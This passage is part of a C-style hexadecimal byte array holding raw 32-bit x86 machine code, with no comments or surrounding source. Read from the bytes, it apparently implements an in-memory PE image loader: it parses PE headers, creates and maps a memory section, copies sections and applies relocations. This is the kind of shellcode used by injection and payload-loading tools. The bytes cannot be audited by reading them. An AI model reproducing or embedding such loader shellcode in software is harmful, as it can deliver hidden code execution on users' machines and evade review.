705 0x83, 0xec, 0x0c, 0x66, 0xc7, 0x45, 0x98, 0x01, 0x00, 0xc7, 0x45, 0xa0,
706 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00,
707 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c,
708 0x8d, 0x4d, 0x88, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xf4, 0x89, 0x4c,
709 0x24, 0x14, 0x8b, 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x04, 0x8b, 0x4d, 0x9c,
710 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x0c, 0x8b,
711 0x4d, 0xa4, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
712 0xec, 0x1c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0xd4,
713 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
714 0x8b, 0x55, 0xb0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
715 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89,
716 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0xa7, 0x02, 0x00, 0x00,
717 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x98,
718 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x02, 0x00, 0x00,
719 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
720 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xe8, 0xff,
721 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95,
722 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
723 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
724 0x00, 0x00, 0xe9, 0x51, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90,
725 0x0c, 0x03, 0x00, 0x00, 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44,
726 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
727 0xe8, 0x1a, 0xe8, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00,
728 0x00, 0x00, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff,
729 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x0f,
730 0x84, 0xf2, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b,
731 0x00, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x18, 0x8b, 0x55,
732 0x10, 0x8b, 0x52, 0x14, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xec, 0x89,
733 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
734 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xa7, 0x01, 0x00, 0x00,
735 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
736 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x0e, 0x01, 0x00,
737 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d, 0x85,
738 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
739 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x84, 0xe7, 0xff, 0xff, 0x8b,
740 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70, 0xfd,
741 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff,
742 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4, 0x8b,
743 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd,
744 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00,
745 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83,
746 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0x94,
747 0x00, 0x00, 0x00, 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x7a,
748 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84,
749 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca,
750 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
751 0xd0, 0x66, 0xc7, 0x45, 0xc8, 0x08, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
752 0x8c, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xc8, 0x89, 0x54, 0x24, 0x08, 0x8d,
753 0x55, 0x84, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24,
754 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00,
755 0x79, 0x1b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b,
756 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xc7, 0x45,
757 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89,
758 0x45, 0x84, 0x8b, 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39,
759 0xd0, 0x0f, 0x82, 0x75, 0xff, 0xff, 0xff, 0x83, 0x7d, 0xf0, 0x00, 0x78,
760 0x7a, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x80, 0xe4,
761 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x18, 0x8d, 0x4d, 0xb8,
762 0x89, 0x4c, 0x24, 0x24, 0x8b, 0x4d, 0xf4, 0x89, 0x4c, 0x24, 0x20, 0x8b,
763 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x10, 0x8b, 0x4d, 0x9c, 0x89, 0x4c, 0x24,
764 0x14, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xa4, 0x89,
765 0x4c, 0x24, 0x1c, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
766 0x44, 0x24, 0x08, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c,
767 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x28, 0x89, 0x45,
768 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x80,
769 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
770 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00,
771 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
772 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89,
773 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x01, 0x00, 0x00, 0x00,
774 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b,
775 0x45, 0x0c, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
776 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
777 0x52, 0x18, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
778 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00, 0x8b,
779 0x45, 0x0c, 0x8b, 0x40, 0x1c, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
780 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
781 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
782 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x8b,
783 0x45, 0x0c, 0x8b, 0x40, 0x14, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
784 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
785 0x52, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
786 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b,
787 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x85, 0xc0, 0x74, 0x68, 0x8b, 0x45, 0x0c,
788 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x50, 0x8b, 0x55, 0x0c, 0x8b,
789 0x4a, 0x10, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x04,
790 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x8b,
791 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x8b, 0x55,
792 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
793 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b,
794 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff,
795 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
796 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x85,
797 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b,
798 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x10, 0x89, 0x14, 0x24, 0xff,
799 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
800 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x85,
801 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x8b, 0x00, 0x8b,
802 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x0c, 0x89, 0x14, 0x24, 0xff,
803 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
804 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
805 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b,
806 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x14, 0x24, 0xff,
807 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
808 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x85, 0xc0,
809 0x74, 0x23, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, 0x08,
810 0x8b, 0x55, 0x0c, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
811 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x00, 0x00, 0x00,
812 0x00, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec,
813 0x4c, 0x04, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00,
814 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8,
815 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00,
816 0x00, 0x00, 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
817 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
818 0x01, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x0c, 0x05, 0x28, 0x05,
819 0x00, 0x00, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x89, 0x45, 0xac, 0x8b,
820 0x45, 0xac, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xb0, 0x01, 0xd0,
821 0x89, 0x45, 0xa8, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38, 0xc7, 0x04, 0x24,
822 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xa4,
823 0x8b, 0x45, 0xa4, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xa0, 0x8b, 0x40, 0x3c,
824 0x89, 0xc2, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45, 0x9c, 0x8b, 0x45,
825 0xa8, 0x0f, 0xb7, 0x50, 0x04, 0x8b, 0x45, 0x9c, 0x0f, 0xb7, 0x40, 0x04,
826 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x2a, 0x11, 0x00, 0x00, 0x8b, 0x45, 0xa8,
827 0x8b, 0x40, 0x50, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0x85, 0x20, 0xfc,
828 0xff, 0xff, 0x89, 0x95, 0x24, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b,
829 0x80, 0xa4, 0x00, 0x00, 0x00, 0x89, 0x45, 0x98, 0x83, 0x7d, 0x98, 0x00,
830 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0x94, 0x83, 0x7d, 0x94,
831 0x00, 0x75, 0x0c, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x34, 0x89, 0x85, 0x1c,
832 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
833 0x00, 0x84, 0xc0, 0x75, 0x59, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x1c,
834 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14,
835 0x00, 0x00, 0x00, 0x08, 0xc7, 0x44, 0x24, 0x10, 0x40, 0x00, 0x00, 0x00,
836 0x8d, 0x85, 0x20, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
837 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00,
838 0x0f, 0x00, 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8,
839 0x7d, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f,
840 0x89, 0x63, 0x01, 0x00, 0x00, 0xe9, 0xac, 0x10, 0x00, 0x00, 0x8b, 0x45,
841 0x08, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81, 0xc2,
842 0xfb, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0xdc, 0xfb,
843 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0xc7, 0x85,
844 0xec, 0xfb, 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0xfb,
845 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf8, 0xfb, 0xff, 0xff,
846 0x40, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xdc, 0xfb, 0xff, 0xff, 0x89, 0x85,
847 0xf4, 0xfb, 0xff, 0xff, 0xc7, 0x85, 0xfc, 0xfb, 0xff, 0xff, 0x00, 0x00,
848 0x00, 0x00, 0xc7, 0x85, 0x00, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
849 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28, 0x00,
850 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7,
851 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x01,
852 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x01, 0x00, 0x00, 0x00, 0xc7,
853 0x44, 0x24, 0x14, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
854 0x00, 0x00, 0x00, 0x8d, 0x85, 0xe4, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24,
855 0x0c, 0x8d, 0x85, 0xec, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0xc7,
856 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x80, 0x8d, 0x85, 0x04, 0xfc, 0xff,
857 0xff, 0x89, 0x04, 0x24, 0xe8, 0xb1, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90,
858 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xac, 0x0f, 0x00, 0x00, 0x8b, 0x85,
859 0x04, 0xfc, 0xff, 0xff, 0x83, 0xf8, 0xff, 0x0f, 0x84, 0x9d, 0x0f, 0x00,
860 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
861 0x0f, 0x00, 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4,
862 0x89, 0x54, 0x24, 0x1c, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14,
863 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44, 0x24, 0x10, 0x02, 0x00, 0x00, 0x00,
864 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
865 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x0f, 0x00,
866 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2f, 0x31,
867 0x00, 0x00, 0x89, 0x45, 0x90, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b,
868 0x55, 0xb4, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x31,
869 0x00, 0x00, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x29, 0x0f, 0x00, 0x00,
870 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
871 0x28, 0xc7, 0x44, 0x24, 0x24, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
872 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00,
873 0x00, 0x8d, 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7,
874 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
875 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
876 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
877 0x04, 0xff, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xc7, 0x30, 0x00,
878 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xbe, 0x0e,
879 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
880 0xb3, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05,
881 0x00, 0x00, 0x84, 0xc0, 0x74, 0x5e, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
882 0x89, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x8b, 0x85, 0x18, 0xfc, 0xff, 0xff,
883 0x89, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24,
884 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7,
885 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff,
886 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x89,
887 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd7,
888 0x30, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88,
889 0x4a, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85,
890 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xb0, 0x89,
891 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xa3, 0x2a, 0x00, 0x00, 0x8b,
892 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x8b, 0x45, 0xa8,
893 0x01, 0xd0, 0x83, 0xc0, 0x18, 0x89, 0x45, 0x8c, 0xc7, 0x45, 0xc4, 0x00,
894 0x00, 0x00, 0x00, 0xeb, 0x67, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0,
895 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0x8c, 0x01,
896 0xd0, 0x8b, 0x50, 0x10, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02,
897 0x01, 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8,
898 0x8b, 0x48, 0x14, 0x8b, 0x45, 0xb0, 0x8d, 0x1c, 0x01, 0x8b, 0xb5, 0x1c,
899 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02, 0x01,
900 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8, 0x8b,
901 0x40, 0x0c, 0x01, 0xf0, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
902 0x89, 0x04, 0x24, 0xe8, 0x22, 0x2a, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01,
903 0x8b, 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45,
904 0xc4, 0x72, 0x8a, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8,
905 0x8b, 0x40, 0x34, 0xf7, 0xd8, 0x01, 0xd0, 0x89, 0x45, 0x88, 0x83, 0x7d,
906 0x94, 0x00, 0x0f, 0x84, 0x52, 0x01, 0x00, 0x00, 0x83, 0x7d, 0x88, 0x00,
907 0x0f, 0x84, 0x48, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x80, 0xa0,
908 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
909 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xcc, 0xe9, 0x04,
910 0x01, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x83, 0xc0, 0x08, 0x89, 0x45, 0xd0,
911 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x8b, 0x10, 0x8b, 0x45,
912 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x01,
913 0xc2, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x50, 0x39, 0xc2, 0x0f, 0x83, 0xb6,
914 0x00, 0x00, 0x00, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xcc,
915 0x8b, 0x08, 0x8b, 0x45, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f,
916 0x0f, 0xb7, 0xc0, 0x01, 0xc8, 0x01, 0xd0, 0x89, 0x45, 0x80, 0x8b, 0x45,
917 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x11,
918 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45,
919 0x80, 0x89, 0x10, 0xeb, 0x78, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01,
920 0x83, 0xe0, 0xf0, 0x3c, 0x30, 0x75, 0x11, 0x8b, 0x45, 0x80, 0x8b, 0x10,
921 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x59,
922 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10,
923 0x75, 0x17, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0xc1, 0xe8,
924 0x10, 0x0f, 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb,
925 0x34, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c,
926 0x20, 0x75, 0x14, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x0f,
927 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x12, 0x8b,
928 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f,
929 0x85, 0xc9, 0x0b, 0x00, 0x00, 0x83, 0x45, 0xd0, 0x02, 0x8b, 0x45, 0xcc,
930 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x39, 0x45, 0xd0, 0x0f,
